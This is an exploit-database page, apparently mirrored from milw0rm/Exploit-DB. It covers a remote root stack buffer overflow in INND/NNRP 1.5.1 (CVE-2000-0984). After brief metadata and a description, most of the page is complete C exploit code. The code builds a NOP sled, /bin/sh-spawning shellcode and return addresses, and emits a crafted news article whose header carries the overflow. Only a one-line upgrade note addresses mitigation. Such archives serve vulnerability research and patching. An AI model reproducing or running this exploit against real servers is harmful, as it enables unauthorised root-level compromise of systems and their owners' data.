header-logo
Suggest Exploit
vendor:
INND/NNRP
by:
milw0rm.com
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: INND/NNRP
Affected Version From: 1.5.1
Affected Version To: 1.5.1
Patch Exists: YES
Related CWE: CVE-2000-0984
CPE: a:inn:inn:1.5.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2000

INND/NNRP remote root overflow

INND/NNRP is vulnerable to a remote root buffer overflow. The vulnerability is caused due to a boundary error within the handling of the 'Path' header. By sending an overly long string, a stack-based buffer overflow occurs, overwriting the return address and allowing arbitrary code execution. The exploit code uses a NOP sled of 4 bytes followed by the shellcode and the return address.

Mitigation:

Upgrade to the latest version of INND/NNRP.
Source

Exploit-DB raw data:

/*
 *  INND/NNRP remote root overflow
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_OFFSET	792
#define BUFFER_SIZE	796
#define ADDRS		80
#define RET			0xefbf95e4
#define NOP			"\x08\x21\x02\x80"

int main(argc, argv)
int argc;
char **argv;
{
  char *buff = NULL, *ptr = NULL;
  u_long *addr_ptr = NULL;
  int ofs = DEFAULT_OFFSET;
  int noplen;
  int i, j;
  u_char execshell[] = 
    "\x34\x16\x05\x06\x96\xd6\x05\x34\x20\x20\x08\x01"
    "\xe4\x20\xe0\x08\x0b\x5a\x02\x9a\xe8\x3f\x1f\xfd"
    "\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02"
    "\x60\x40\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99"
    "\x0b\x18\x02\x98\x34\x16\x04\xbe\x20\x20\x08\x01"
    "\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe"
    "/bin/sh";
  
  if(argc > 1)
    ofs = atoi(argv[1]);

  if(!(buff = malloc(4096)))
  {
    (void)fprintf(stderr, "can't allocate memory\n");
    exit(1);
  }

  ptr = buff;
  noplen = BUFFER_SIZE - strlen(execshell) - ADDRS;

  for(i = 0; i < noplen / 4; i++)
  {
    for(j = 0; j < 4; j++)
      *ptr++ = NOP[j];
  }

  *ptr += noplen;

  for(i = 0; i < strlen(execshell); i++)
    *ptr++ = execshell[i];

  addr_ptr = (unsigned long *)ptr;

  for(i = 0; i < ADDRS / 4; i++)
    *addr_ptr++ = (RET - ofs);

  ptr = (char *)addr_ptr;
  *ptr = '\0';

  (void)fprintf(stderr, "shellcode len: %d, RET: %x\n", strlen(buff), RET-ofs);

  printf(
    "Path: babcia!padlina\n"
    "From: babunia @%s\n"
    "Newsgroups: pl.test\n"
    "Subject: test\n"
    "Message-ID: <830201540.9220@padlina.z-miesne.krakow.pl>\n"
    "Date: 26 Aug 1999 10:36:54 +0200\n"
    "Lines: 1\n"
    "\n"
    "west. test it.\n"
    ".\n", buff);
}


// milw0rm.com [2000-11-30]

Navigation

Suggest Exploit

Services By CQR